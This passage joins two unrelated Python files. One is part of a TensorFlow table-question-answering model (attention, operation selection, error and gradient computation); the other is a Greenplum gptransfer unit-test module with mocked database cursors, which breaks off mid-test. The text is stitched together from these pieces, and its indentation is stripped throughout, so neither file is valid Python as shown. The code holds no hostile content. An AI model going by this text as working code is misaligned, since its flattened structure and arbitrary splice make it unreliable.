tf.fill(tf.shape(question_number_softmax), 1.0),
tf.fill(tf.shape(question_number_softmax), 0.0))
question_number_softmax = tf.cast(question_number_softmax,
self.data_type)
ans = tf.reshape(
tf.reduce_sum(question_number_softmax * tf.concat(
1, [self.batch_question_number, self.batch_question_number_one]),
1), [self.batch_size, 1])
return ans
def compute_op_position(op_name):
for i in range(len(self.utility.operations_set)):
if (op_name == self.utility.operations_set[i]):
return i
def compute_question_number(op_name):
op_embedding = tf.nn.embedding_lookup(self.params_unit,
compute_op_position(op_name))
return compute_ans(op_embedding, op_name)
curr_greater_question_number = compute_question_number("greater")
curr_lesser_question_number = compute_question_number("lesser")
curr_geq_question_number = compute_question_number("geq")
curr_leq_question_number = compute_question_number("leq")
return curr_greater_question_number, curr_lesser_question_number, curr_geq_question_number, curr_leq_question_number
def perform_attention(self, context_vector, hidden_vectors, length, mask):
#Performs attention on hidden_vectors using the context vector
context_vector = tf.tile(
tf.expand_dims(context_vector, 0), [length, 1, 1]) #time * bs * d
attention_softmax = tf.nn.softmax(
tf.transpose(tf.reduce_sum(context_vector * hidden_vectors, 2)) +
mask) #batch_size * time
attention_softmax = tf.tile(
tf.expand_dims(tf.transpose(attention_softmax), 2),
[1, 1, self.embedding_dims])
ans_vector = tf.reduce_sum(attention_softmax * hidden_vectors, 0)
return ans_vector
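# Informally, the routine above computes a_t = softmax_t(<context, h_t> + mask) over the
# time axis and returns sum_t a_t * h_t, a context-weighted average of the hidden vectors.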
#computes embeddings for column names using parameters of question module
def get_column_hidden_vectors(self):
#vector representations for the column names
self.column_hidden_vectors = tf.reduce_sum(
nn_utils.get_embedding(self.batch_number_column_names, self.utility,
self.params), 2)
self.word_column_hidden_vectors = tf.reduce_sum(
nn_utils.get_embedding(self.batch_word_column_names, self.utility,
self.params), 2)
def create_summary_embeddings(self):
#embeddings for each text entry in the table using parameters of the question module
self.summary_text_entry_embeddings = tf.reduce_sum(
tf.expand_dims(self.batch_exact_match, 3) * tf.expand_dims(
tf.expand_dims(
tf.expand_dims(
nn_utils.get_embedding(self.utility.entry_match_token_id,
self.utility, self.params), 0), 1),
2), 2)
def compute_column_softmax(self, column_controller_vector, time_step):
#compute softmax over all the columns using column controller vector
column_controller_vector = tf.tile(
tf.expand_dims(column_controller_vector, 1),
[1, self.num_cols + self.num_word_cols, 1]) #max_cols * bs * d
column_controller_vector = nn_utils.apply_dropout(
column_controller_vector, self.utility.FLAGS.dropout, self.mode)
self.full_column_hidden_vectors = tf.concat(
1, [self.column_hidden_vectors, self.word_column_hidden_vectors])
self.full_column_hidden_vectors += self.summary_text_entry_embeddings
self.full_column_hidden_vectors = nn_utils.apply_dropout(
self.full_column_hidden_vectors, self.utility.FLAGS.dropout, self.mode)
column_logits = tf.reduce_sum(
column_controller_vector * self.full_column_hidden_vectors, 2) + (
self.params["word_match_feature_column_name"] *
self.batch_column_exact_match) + self.full_column_mask
column_softmax = tf.nn.softmax(column_logits) #batch_size * max_cols
return column_softmax
def compute_first_or_last(self, select, first=True):
#perform first or last operation on row select with probabilistic row selection
answer = tf.zeros_like(select)
running_sum = tf.zeros([self.batch_size, 1], self.data_type)
for i in range(self.max_elements):
if (first):
current = tf.slice(select, [0, i], [self.batch_size, 1])
else:
current = tf.slice(select, [0, self.max_elements - 1 - i],
[self.batch_size, 1])
curr_prob = current * (1 - running_sum)
curr_prob = curr_prob * tf.cast(curr_prob >= 0.0, self.data_type)
running_sum += curr_prob
temp_ans = []
curr_prob = tf.expand_dims(tf.reshape(curr_prob, [self.batch_size]), 0)
for i_ans in range(self.max_elements):
if (not (first) and i_ans == self.max_elements - 1 - i):
temp_ans.append(curr_prob)
elif (first and i_ans == i):
temp_ans.append(curr_prob)
else:
temp_ans.append(tf.zeros_like(curr_prob))
temp_ans = tf.transpose(tf.concat(0, temp_ans))
answer += temp_ans
return answer
def make_hard_softmax(self, softmax):
#converts soft selection to hard selection. used at test time
cond = tf.equal(
softmax, tf.reshape(tf.reduce_max(softmax, 1), [self.batch_size, 1]))
softmax = tf.select(
cond, tf.fill(tf.shape(softmax), 1.0), tf.fill(tf.shape(softmax), 0.0))
softmax = tf.cast(softmax, self.data_type)
return softmax
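# In effect each row of the soft distribution is replaced by an indicator of its maximal
# entries (ties all receive 1.0 rather than being renormalized), which is the hard
# selection used at test time.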
def compute_max_or_min(self, select, maxi=True):
#computes the argmax and argmin of a column with probabilistic row selection
answer = tf.zeros([
self.batch_size, self.num_cols + self.num_word_cols, self.max_elements
], self.data_type)
sum_prob = tf.zeros([self.batch_size, self.num_cols + self.num_word_cols],
self.data_type)
for j in range(self.max_elements):
if (maxi):
curr_pos = j
else:
curr_pos = self.max_elements - 1 - j
select_index = tf.slice(self.full_processed_sorted_index_column,
[0, 0, curr_pos], [self.batch_size, -1, 1])
select_mask = tf.equal(
tf.tile(
tf.expand_dims(
tf.tile(
tf.expand_dims(tf.range(self.max_elements), 0),
[self.batch_size, 1]), 1),
[1, self.num_cols + self.num_word_cols, 1]), select_index)
curr_prob = tf.expand_dims(select, 1) * tf.cast(
select_mask, self.data_type) * self.select_bad_number_mask
curr_prob = curr_prob * tf.expand_dims((1 - sum_prob), 2)
curr_prob = curr_prob * tf.expand_dims(
tf.cast((1 - sum_prob) > 0.0, self.data_type), 2)
answer = tf.select(select_mask, curr_prob, answer)
sum_prob += tf.reduce_sum(curr_prob, 2)
return answer
def perform_operations(self, softmax, full_column_softmax, select,
prev_select_1, curr_pass):
#performs all the 15 operations. computes scalar output, lookup answer and row selector
column_softmax = tf.slice(full_column_softmax, [0, 0],
[self.batch_size, self.num_cols])
word_column_softmax = tf.slice(full_column_softmax, [0, self.num_cols],
[self.batch_size, self.num_word_cols])
init_max = self.compute_max_or_min(select, maxi=True)
init_min = self.compute_max_or_min(select, maxi=False)
#operations that are column independent
count = tf.reshape(tf.reduce_sum(select, 1), [self.batch_size, 1])
select_full_column_softmax = tf.tile(
tf.expand_dims(full_column_softmax, 2),
[1, 1, self.max_elements
]) #BS * (max_cols + max_word_cols) * max_elements
select_word_column_softmax = tf.tile(
tf.expand_dims(word_column_softmax, 2),
[1, 1, self.max_elements]) #BS * max_word_cols * max_elements
select_greater = tf.reduce_sum(
self.init_select_greater * select_full_column_softmax,
1) * self.batch_question_number_mask #BS * max_elements
select_lesser = tf.reduce_sum(
self.init_select_lesser * select_full_column_softmax,
1) * self.batch_question_number_mask #BS * max_elements
select_geq = tf.reduce_sum(
self.init_select_geq * select_full_column_softmax,
1) * self.batch_question_number_mask #BS * max_elements
select_leq = tf.reduce_sum(
self.init_select_leq * select_full_column_softmax,
1) * self.batch_question_number_mask #BS * max_elements
select_max = tf.reduce_sum(init_max * select_full_column_softmax,
1) #BS * max_elements
select_min = tf.reduce_sum(init_min * select_full_column_softmax,
1) #BS * max_elements
select_prev = tf.concat(1, [
tf.slice(select, [0, 1], [self.batch_size, self.max_elements - 1]),
tf.cast(tf.zeros([self.batch_size, 1]), self.data_type)
])
select_next = tf.concat(1, [
tf.cast(tf.zeros([self.batch_size, 1]), self.data_type), tf.slice(
select, [0, 0], [self.batch_size, self.max_elements - 1])
])
select_last_rs = self.compute_first_or_last(select, False)
select_first_rs = self.compute_first_or_last(select, True)
select_word_match = tf.reduce_sum(self.batch_exact_match *
select_full_column_softmax, 1)
select_group_by_max = tf.reduce_sum(self.batch_group_by_max *
select_full_column_softmax, 1)
length_content = 1
length_select = 13
length_print = 1
values = tf.concat(1, [count])
softmax_content = tf.slice(softmax, [0, 0],
[self.batch_size, length_content])
#compute scalar output
output = tf.reduce_sum(tf.mul(softmax_content, values), 1)
#compute lookup answer
softmax_print = tf.slice(softmax, [0, length_content + length_select],
[self.batch_size, length_print])
curr_print = select_full_column_softmax * tf.tile(
tf.expand_dims(select, 1),
[1, self.num_cols + self.num_word_cols, 1
]) #BS * max_cols * max_elements (considers only column)
self.batch_lookup_answer = curr_print * tf.tile(
tf.expand_dims(softmax_print, 2),
[1, self.num_cols + self.num_word_cols, self.max_elements
]) #BS * max_cols * max_elements
self.batch_lookup_answer = self.batch_lookup_answer * self.select_full_mask
#compute row select
softmax_select = tf.slice(softmax, [0, length_content],
[self.batch_size, length_select])
select_lists = [
tf.expand_dims(select_prev, 1), tf.expand_dims(select_next, 1),
tf.expand_dims(select_first_rs, 1), tf.expand_dims(select_last_rs, 1),
tf.expand_dims(select_group_by_max, 1),
tf.expand_dims(select_greater, 1), tf.expand_dims(select_lesser, 1),
tf.expand_dims(select_geq, 1), tf.expand_dims(select_leq, 1),
tf.expand_dims(select_max, 1), tf.expand_dims(select_min, 1),
tf.expand_dims(select_word_match, 1),
tf.expand_dims(self.reset_select, 1)
]
select = tf.reduce_sum(
tf.tile(tf.expand_dims(softmax_select, 2), [1, 1, self.max_elements]) *
tf.concat(1, select_lists), 1)
select = select * self.select_whole_mask
return output, select
def one_pass(self, select, question_embedding, hidden_vectors, hprev,
prev_select_1, curr_pass):
#Performs one timestep which involves selecting an operation and a column
attention_vector = self.perform_attention(
hprev, hidden_vectors, self.question_length,
self.batch_question_attention_mask) #batch_size * embedding_dims
controller_vector = tf.nn.relu(
tf.matmul(hprev, self.params["controller_prev"]) + tf.matmul(
tf.concat(1, [question_embedding, attention_vector]), self.params[
"controller"]))
column_controller_vector = tf.nn.relu(
tf.matmul(hprev, self.params["column_controller_prev"]) + tf.matmul(
tf.concat(1, [question_embedding, attention_vector]), self.params[
"column_controller"]))
controller_vector = nn_utils.apply_dropout(
controller_vector, self.utility.FLAGS.dropout, self.mode)
self.operation_logits = tf.matmul(controller_vector,
tf.transpose(self.params_unit))
softmax = tf.nn.softmax(self.operation_logits)
soft_softmax = softmax
#compute column softmax: bs * max_columns
weighted_op_representation = tf.transpose(
tf.matmul(tf.transpose(self.params_unit), tf.transpose(softmax)))
column_controller_vector = tf.nn.relu(
tf.matmul(
tf.concat(1, [
column_controller_vector, weighted_op_representation
]), self.params["break_conditional"]))
full_column_softmax = self.compute_column_softmax(column_controller_vector,
curr_pass)
soft_column_softmax = full_column_softmax
if (self.mode == "test"):
full_column_softmax = self.make_hard_softmax(full_column_softmax)
softmax = self.make_hard_softmax(softmax)
output, select = self.perform_operations(softmax, full_column_softmax,
select, prev_select_1, curr_pass)
return output, select, softmax, soft_softmax, full_column_softmax, soft_column_softmax
def compute_lookup_error(self, val):
#computes lookup error.
cond = tf.equal(self.batch_print_answer, val)
inter = tf.select(
cond, self.init_print_error,
tf.tile(
tf.reshape(tf.constant(1e10, self.data_type), [1, 1, 1]), [
self.batch_size, self.utility.FLAGS.max_word_cols +
self.utility.FLAGS.max_number_cols,
self.utility.FLAGS.max_elements
]))
return tf.reduce_min(tf.reduce_min(inter, 1), 1) * tf.cast(
tf.greater(
tf.reduce_sum(tf.reduce_sum(tf.cast(cond, self.data_type), 1), 1),
0.0), self.data_type)
def soft_min(self, x, y):
return tf.maximum(-1.0 * (1 / (
self.utility.FLAGS.soft_min_value + 0.0)) * tf.log(
tf.exp(-self.utility.FLAGS.soft_min_value * x) + tf.exp(
-self.utility.FLAGS.soft_min_value * y)), tf.zeros_like(x))
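# The expression above is a smooth approximation of min(x, y), clipped at zero:
#   soft_min(x, y) = max(0, -(1/k) * log(exp(-k*x) + exp(-k*y)))   with k = FLAGS.soft_min_value
# Larger k makes the approximation tighter; the clipping keeps the blended error non-negative.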
def error_computation(self):
#computes the error of each example in a batch
math_error = 0.5 * tf.square(tf.sub(self.scalar_output, self.batch_answer))
#scale math error
math_error = math_error / self.rows
math_error = tf.minimum(math_error, self.utility.FLAGS.max_math_error *
tf.ones(tf.shape(math_error), self.data_type))
self.init_print_error = tf.select(
self.batch_gold_select, -1 * tf.log(self.batch_lookup_answer + 1e-300 +
self.invert_select_full_mask), -1 *
tf.log(1 - self.batch_lookup_answer)) * self.select_full_mask
print_error_1 = self.init_print_error * tf.cast(
tf.equal(self.batch_print_answer, 0.0), self.data_type)
print_error = tf.reduce_sum(tf.reduce_sum((print_error_1), 1), 1)
for val in range(1, 58):
print_error += self.compute_lookup_error(val + 0.0)
print_error = print_error * self.utility.FLAGS.print_cost / self.num_entries
if (self.mode == "train"):
error = tf.select(
tf.logical_and(
tf.not_equal(self.batch_answer, 0.0),
tf.not_equal(
tf.reduce_sum(tf.reduce_sum(self.batch_print_answer, 1), 1),
0.0)),
self.soft_min(math_error, print_error),
tf.select(
tf.not_equal(self.batch_answer, 0.0), math_error, print_error))
else:
error = tf.select(
tf.logical_and(
tf.equal(self.scalar_output, 0.0),
tf.equal(
tf.reduce_sum(tf.reduce_sum(self.batch_lookup_answer, 1), 1),
0.0)),
tf.ones_like(math_error),
tf.select(
tf.equal(self.scalar_output, 0.0), print_error, math_error))
return error
def batch_process(self):
#Computes loss and fraction of correct examples in a batch.
self.params_unit = nn_utils.apply_dropout(
self.params["unit"], self.utility.FLAGS.dropout, self.mode)
batch_size = self.batch_size
max_passes = self.max_passes
num_timesteps = 1
max_elements = self.max_elements
select = tf.cast(
tf.fill([self.batch_size, max_elements], 1.0), self.data_type)
hprev = tf.cast(
tf.fill([self.batch_size, self.embedding_dims], 0.0),
self.data_type) #running sum of the hidden states of the model
output = tf.cast(tf.fill([self.batch_size, 1], 0.0),
self.data_type) #output of the model
correct = tf.cast(
tf.fill([1], 0.0), self.data_type
) #to compute accuracy, returns number of correct examples for this batch
total_error = 0.0
prev_select_1 = tf.zeros_like(select)
self.create_summary_embeddings()
self.get_column_hidden_vectors()
#get question embedding
question_embedding, hidden_vectors = self.LSTM_question_embedding(
self.batch_question, self.question_length)
#compute arguments for comparison operation
greater_question_number, lesser_question_number, geq_question_number, leq_question_number = self.question_number_softmax(
hidden_vectors)
self.init_select_greater = tf.cast(
tf.greater(self.full_processed_column,
tf.expand_dims(greater_question_number, 2)), self.
data_type) * self.select_bad_number_mask #bs * max_cols * max_elements
self.init_select_lesser = tf.cast(
tf.less(self.full_processed_column,
tf.expand_dims(lesser_question_number, 2)), self.
data_type) * self.select_bad_number_mask #bs * max_cols * max_elements
self.init_select_geq = tf.cast(
tf.greater_equal(self.full_processed_column,
tf.expand_dims(geq_question_number, 2)), self.
data_type) * self.select_bad_number_mask #bs * max_cols * max_elements
self.init_select_leq = tf.cast(
tf.less_equal(self.full_processed_column,
tf.expand_dims(leq_question_number, 2)), self.
data_type) * self.select_bad_number_mask #bs * max_cols * max_elements
self.init_select_word_match = 0
if (self.utility.FLAGS.rnn_dropout > 0.0):
if (self.mode == "train"):
history_rnn_dropout_mask = tf.cast(
tf.random_uniform(
tf.shape(hprev), minval=0.0, maxval=1.0) <
self.utility.FLAGS.rnn_dropout,
self.data_type) / self.utility.FLAGS.rnn_dropout
else:
history_rnn_dropout_mask = tf.ones_like(hprev)
select = select * self.select_whole_mask
self.batch_log_prob = tf.zeros([self.batch_size], dtype=self.data_type)
#Perform max_passes and at each pass select operation and column
for curr_pass in range(max_passes):
print "step: ", curr_pass
output, select, softmax, soft_softmax, column_softmax, soft_column_softmax = self.one_pass(
select, question_embedding, hidden_vectors, hprev, prev_select_1,
curr_pass)
prev_select_1 = select
#compute input to history RNN
input_op = tf.transpose(
tf.matmul(
tf.transpose(self.params_unit), tf.transpose(
soft_softmax))) #weighted average of embeddings of operations
input_col = tf.reduce_sum(
tf.expand_dims(soft_column_softmax, 2) *
self.full_column_hidden_vectors, 1)
history_input = tf.concat(1, [input_op, input_col])
history_input = nn_utils.apply_dropout(
history_input, self.utility.FLAGS.dropout, self.mode)
hprev = self.history_recurrent_step(history_input, hprev)
if (self.utility.FLAGS.rnn_dropout > 0.0):
hprev = hprev * history_rnn_dropout_mask
self.scalar_output = output
error = self.error_computation()
cond = tf.less(error, 0.0001, name="cond")
correct_add = tf.select(
cond, tf.fill(tf.shape(cond), 1.0), tf.fill(tf.shape(cond), 0.0))
correct = tf.reduce_sum(correct_add)
error = error / batch_size
total_error = tf.reduce_sum(error)
total_correct = correct / batch_size
return total_error, total_correct
def compute_error(self):
#Sets mask variables and performs batch processing
self.batch_gold_select = self.batch_print_answer > 0.0
self.full_column_mask = tf.concat(
1, [self.batch_number_column_mask, self.batch_word_column_mask])
self.full_processed_column = tf.concat(
1,
[self.batch_processed_number_column, self.batch_processed_word_column])
self.full_processed_sorted_index_column = tf.concat(1, [
self.batch_processed_sorted_index_number_column,
self.batch_processed_sorted_index_word_column
])
self.select_bad_number_mask = tf.cast(
tf.logical_and(
tf.not_equal(self.full_processed_column,
self.utility.FLAGS.pad_int),
tf.not_equal(self.full_processed_column,
self.utility.FLAGS.bad_number_pre_process)),
self.data_type)
self.select_mask = tf.cast(
tf.logical_not(
tf.equal(self.batch_number_column, self.utility.FLAGS.pad_int)),
self.data_type)
self.select_word_mask = tf.cast(
tf.logical_not(
tf.equal(self.batch_word_column_entry_mask,
self.utility.dummy_token_id)), self.data_type)
self.select_full_mask = tf.concat(
1, [self.select_mask, self.select_word_mask])
self.select_whole_mask = tf.maximum(
tf.reshape(
tf.slice(self.select_mask, [0, 0, 0],
[self.batch_size, 1, self.max_elements]),
[self.batch_size, self.max_elements]),
tf.reshape(
tf.slice(self.select_word_mask, [0, 0, 0],
[self.batch_size, 1, self.max_elements]),
[self.batch_size, self.max_elements]))
self.invert_select_full_mask = tf.cast(
tf.concat(1, [
tf.equal(self.batch_number_column, self.utility.FLAGS.pad_int),
tf.equal(self.batch_word_column_entry_mask,
self.utility.dummy_token_id)
]), self.data_type)
self.batch_lookup_answer = tf.zeros(tf.shape(self.batch_gold_select))
self.reset_select = self.select_whole_mask
self.rows = tf.reduce_sum(self.select_whole_mask, 1)
self.num_entries = tf.reshape(
tf.reduce_sum(tf.reduce_sum(self.select_full_mask, 1), 1),
[self.batch_size])
self.final_error, self.final_correct = self.batch_process()
return self.final_error
def create_graph(self, params, global_step):
#Creates the graph to compute error, gradient computation and updates parameters
self.params = params
batch_size = self.batch_size
learning_rate = tf.cast(self.utility.FLAGS.learning_rate, self.data_type)
self.total_cost = self.compute_error()
optimize_params = self.params.values()
optimize_names = self.params.keys()
print "optimize params ", optimize_names
if (self.utility.FLAGS.l2_regularizer > 0.0):
reg_cost = 0.0
for ind_param in self.params.keys():
reg_cost += tf.nn.l2_loss(self.params[ind_param])
self.total_cost += self.utility.FLAGS.l2_regularizer * reg_cost
grads = tf.gradients(self.total_cost, optimize_params, name="gradients")
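    #global-norm gradient clipping: rescale all gradients when their combined norm exceeds clip_gradients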
grad_norm = 0.0
for p, name in zip(grads, optimize_names):
print "grads: ", p, name
if isinstance(p, tf.IndexedSlices):
grad_norm += tf.reduce_sum(p.values * p.values)
      elif p is not None:
grad_norm += tf.reduce_sum(p * p)
grad_norm = tf.sqrt(grad_norm)
max_grad_norm = np.float32(self.utility.FLAGS.clip_gradients).astype(
self.utility.np_data_type[self.utility.FLAGS.data_type])
grad_scale = tf.minimum(
tf.cast(1.0, self.data_type), max_grad_norm / grad_norm)
clipped_grads = list()
for p in grads:
if isinstance(p, tf.IndexedSlices):
tmp = p.values * grad_scale
clipped_grads.append(tf.IndexedSlices(tmp, p.indices))
      elif p is not None:
clipped_grads.append(p * grad_scale)
else:
clipped_grads.append(p)
grads = clipped_grads
self.global_step = global_step
params_list = self.params.values()
params_list.append(self.global_step)
adam = tf.train.AdamOptimizer(
learning_rate,
epsilon=tf.cast(self.utility.FLAGS.eps, self.data_type),
use_locking=True)
self.step = adam.apply_gradients(zip(grads, optimize_params),
global_step=self.global_step)
self.init_op = tf.initialize_all_variables()
|
|
import imp
import os
import re
import tempfile
import shutil
from mock import *
from gp_unittest import *
from gparray import GpDB, GpArray
from gppylib.db.dbconn import UnexpectedRowsError
from pygresql import pgdb
from gppylib.operations.backup_utils import escapeDoubleQuoteInSQLString
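# Regular expressions used to recognize the SQL issued by gptransfer so the mocked cursor can return canned rows per query type.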
cursor_keys = dict(
normal_tables=re.compile(".*n\.nspname, c\.relname, c\.relstorage.*c\.oid NOT IN \( SELECT parchildrelid.*"),
partition_tables=re.compile(".*n\.nspname, c\.relname, c\.relstorage(?!.*SELECT parchildrelid).*"),
relations=re.compile(".*select relname from pg_class r.*"),
table_info=re.compile(".*select is_nullable, data_type, character_maximum_length,.*"),
partition_info=re.compile(".*select parkind, parlevel, parnatts, paratts.*"),
schema_name=re.compile(".*SELECT fsname FROM pg_catalog.pg_filespace.*"),
create_schema=re.compile(".*CREATE SCHEMA.*"),
ordinal_pos=re.compile(".*select ordinal_position from.*"),
attname=re.compile(".*SELECT attname.*"),
)
class GpTransfer(GpTestCase):
TEMP_DIR = "/tmp/test_unit_gptransfer"
def setUp(self):
if not os.path.exists(self.TEMP_DIR):
os.makedirs(self.TEMP_DIR)
# because gptransfer does not have a .py extension,
# we have to use imp to import it
# if we had a gptransfer.py, this is equivalent to:
# import gptransfer
# self.subject = gptransfer
gptransfer_file = os.path.abspath(os.path.dirname(__file__) + "/../../../gptransfer")
self.subject = imp.load_source('gptransfer', gptransfer_file)
self.subject.logger = Mock(spec=['log', 'warn', 'info', 'debug', 'error', 'warning'])
self.gparray = self.createGpArrayWith2Primary2Mirrors()
self.db_connection = MagicMock()
# TODO: We should be using a spec here, but I haven't been able to narrow down exactly which call is causing an attribute error when using the spec.
        # The error is occurring because we don't mock out every possible SQL command, and some get swallowed (which is fine so far), but to fully support specs
# we need to go through and mock all the SQL calls
# self.db_connection = MagicMock(spec=["__exit__", "close", "__enter__", "commit", "rollback"])
self.cursor = MagicMock(spec=pgdb.pgdbCursor)
self.db_singleton = Mock()
self.workerpool = MagicMock()
self.workerpool.work_queue.qsize.return_value = 0
self.apply_patches([
patch('os.environ', new={"GPHOME": "my_gp_home"}),
patch('gppylib.operations.dump.GpArray.initFromCatalog', return_value=self.gparray),
patch('gptransfer.connect', return_value=self.db_connection),
patch('gptransfer.getUserDatabaseList', return_value=[["my_first_database"], ["my_second_database"]]),
patch('gppylib.db.dbconn.connect', return_value=self.db_connection),
patch('gptransfer.WorkerPool', return_value=self.workerpool),
patch('gptransfer.doesSchemaExist', return_value=False),
patch('gptransfer.dropSchemaIfExist'),
patch('gptransfer.execSQL', new=self.cursor),
patch('gptransfer.execSQLForSingletonRow', new=self.db_singleton),
patch("gppylib.commands.unix.FileDirExists.remote", return_value=True),
patch("gptransfer.wait_for_pool", return_value=([], [])),
patch("gptransfer.escapeDoubleQuoteInSQLString"),
])
# We have a GIGANTIC class that uses 31 arguments, so pre-setting this
# here
self.GpTransferCommand_args = dict(
name='foo',
src_host='foo',
src_port='foo',
src_user='foo',
dest_host='foo',
dest_port='foo',
dest_user='foo',
table_pair='foo',
dest_exists='foo',
truncate='foo',
analyze='foo',
drop='foo',
fast_mode='foo',
exclusive_lock='foo',
schema_only='foo',
work_dir='foo',
host_map='foo',
source_config='foo',
batch_size='foo',
gpfdist_port='foo',
gpfdist_last_port='foo',
gpfdist_instance_count='foo',
max_line_length='foo',
timeout='foo',
wait_time='foo',
delimiter='foo',
validator='foo',
format='foo',
quote='foo',
table_transfer_set_total='foo')
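        # Default command-line options for constructing a GpTransfer in the tests; individual tests override the ones they need.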
self.GpTransfer_options_defaults = dict(
analyze=False,
base_port=8000,
batch_size=2,
databases=[],
delimiter=',',
dest_database=None,
dest_host='127.0.0.1',
dest_port=5432,
dest_user='gpadmin',
drop=False,
dry_run=False,
enable_test=False,
exclude_input_file=None,
exclude_tables=[],
exclusive_lock=False,
force_standard_mode=False,
format='CSV',
full=False,
input_file=None,
interactive=False,
last_port=-1,
logfileDirectory=None,
max_gpfdist_instances=1,
max_line_length=10485760,
no_final_count_validation=False,
partition_transfer=False,
partition_transfer_non_pt_target=False,
quiet=None,
quote='\x01',
schema_only=False,
skip_existing=False,
source_host='127.0.0.1',
source_map_file=None,
source_port=5432,
source_user='gpadmin',
sub_batch_size=25,
tables=[],
timeout=300,
truncate=False,
validator=None,
verbose=None,
wait_time=3,
work_base_dir='/home/gpadmin/',
)
def tearDown(self):
shutil.rmtree(self.TEMP_DIR)
@patch('gptransfer.TableValidatorFactory', return_value=Mock())
def test__get_distributed_by_quotes_column_name(self, mock1):
gptransfer = self.subject
cmd_args = self.GpTransferCommand_args
src_args = ('src', 'public', 'foo', False)
dest_args = ('dest', 'public', 'foo', False)
source_table = gptransfer.GpTransferTable(*src_args)
dest_table = gptransfer.GpTransferTable(*dest_args)
cmd_args['table_pair'] = gptransfer.GpTransferTablePair(source_table, dest_table)
side_effect = CursorSideEffect()
side_effect.append_regexp_key(cursor_keys['attname'], ['foo'])
self.cursor.side_effect = side_effect.cursor_side_effect
        self.subject.escapeDoubleQuoteInSQLString.return_value = '"escaped_string"'
table_validator = gptransfer.GpTransferCommand(**cmd_args)
expected_distribution = '''DISTRIBUTED BY ("escaped_string")'''
self.assertEqual(expected_distribution, table_validator._get_distributed_by())
@patch('gptransfer.TableValidatorFactory', return_value=Mock())
def test__get_distributed_by_quotes_multiple_column_names(self, mock1):
gptransfer = self.subject
cmd_args = self.GpTransferCommand_args
src_args = ('src', 'public', 'foo', False)
dest_args = ('dest', 'public', 'foo', False)
source_table = gptransfer.GpTransferTable(*src_args)
dest_table = gptransfer.GpTransferTable(*dest_args)
cmd_args['table_pair'] = gptransfer.GpTransferTablePair(source_table, dest_table)
side_effect = CursorSideEffect()
side_effect.append_regexp_key(cursor_keys['attname'], ['foo', 'bar'])
self.cursor.side_effect = side_effect.cursor_side_effect
self.subject.escapeDoubleQuoteInSQLString.side_effect = ['"first_escaped_value"', '"second_escaped_value"']
table_validator = gptransfer.GpTransferCommand(**cmd_args)
expected_distribution = '''DISTRIBUTED BY ("first_escaped_value", "second_escaped_value")'''
self.assertEqual(expected_distribution, table_validator._get_distributed_by())
@patch('gptransfer.TableValidatorFactory', return_value=Mock())
def test__get_distributed_randomly_when_no_distribution_keys(self, mock1):
side_effect = CursorSideEffect()
side_effect.append_regexp_key(cursor_keys['attname'], [])
self.cursor.side_effect = side_effect.cursor_side_effect
table_validator = self._get_gptransfer_command()
expected_distribution = '''DISTRIBUTED RANDOMLY'''
result_distribution = table_validator._get_distributed_by()
self.assertEqual(0, len(self.subject.logger.method_calls))
self.assertEqual(expected_distribution, result_distribution)
@patch('gptransfer.TableValidatorFactory', return_value=Mock())
def test_get_distributed_randomly_handles_exception(self, mock1):
self.cursor.side_effect = ""
table_validator = self._get_gptransfer_command()
expected_distribution = '''DISTRIBUTED RANDOMLY'''
result_distribution = table_validator._get_distributed_by()
self.assertEqual(1, len(self.subject.logger.method_calls))
self.assertEqual(expected_distribution, result_distribution)
def test__normal_transfer_no_tables_does_nothing_but_log(self):
options = self.setup_normal_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write("my_first_database.public.nonexistent_table")
with self.assertRaises(SystemExit):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_info_messages()
self.assertIn("Found no tables to transfer.", log_messages[-1])
def test__normal_transfer_with_tables_validates(self):
options = self.setup_normal_to_normal_validation()
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_info_messages()
self.assertIn("Validating transfer table set...", log_messages)
def test__normal_transfer_when_destination_table_already_exists_fails(self):
options = self.setup_normal_to_normal_validation()
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
}
self.cursor.side_effect = CursorSideEffect(additional=additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "Table my_first_database.public.my_normal_table exists in database my_first_database"):
self.subject.GpTransfer(Mock(**options), [])
def test__normal_transfer_when_input_file_bad_format_comma_fails(self):
options = self.setup_normal_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write("my_first_database.public.my_table, my_second_database.public.my_table")
self.cursor.side_effect = CursorSideEffect().cursor_side_effect
with self.assertRaisesRegexp(Exception, "Destination tables \(comma separated\) are only allowed for partition tables"):
self.subject.GpTransfer(Mock(**options), [])
@patch('gptransfer.CountTableValidator.accumulate', side_effect=Exception('BOOM'))
    def test__final_count_validation_when_throws_should_raise_exception(self, mock1):
options = self.setup_normal_to_normal_validation()
with self.assertRaisesRegexp(Exception, "Final count validation failed"):
self.subject.GpTransfer(Mock(**options), []).run()
def test__final_count_invalid_one_src_one_dest_table_logs_error(self):
options = self.setup_normal_to_normal_validation()
additional = {
"SELECT count(*) FROM": [3]
}
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation failed for %s", self.get_error_logging())
def test__partition_to_partition_final_count_invalid_one_src_one_dest_table_logs_warning(self):
options = self.setup_partition_validation()
additional = {
"SELECT count(*) FROM": [3]
}
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation failed for %s", self.get_warnings())
def test__partition_to_partition_when_invalid_final_counts_should_warn(self):
options = self.setup_partition_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_table_partition1\n"
"my_first_database.public.my_table_partition2")
additional = {
cursor_keys["partition_tables"]: [["public", "my_table_partition1", ""],
["public", "my_table_partition2", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
multi = {
"SELECT count(*) FROM": [[12], [10]]
}
self.db_singleton.side_effect = SingletonSideEffect(multi_list=multi).singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation failed for %s", self.get_warnings())
def test__partition_to_partition_when_valid_final_counts_mult_src_same_dest_table_succeeds(self):
options = self.setup_partition_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_table_partition1\n"
"my_first_database.public.my_table_partition2")
additional = {
cursor_keys["partition_tables"]: [["public", "my_table_partition1", ""],
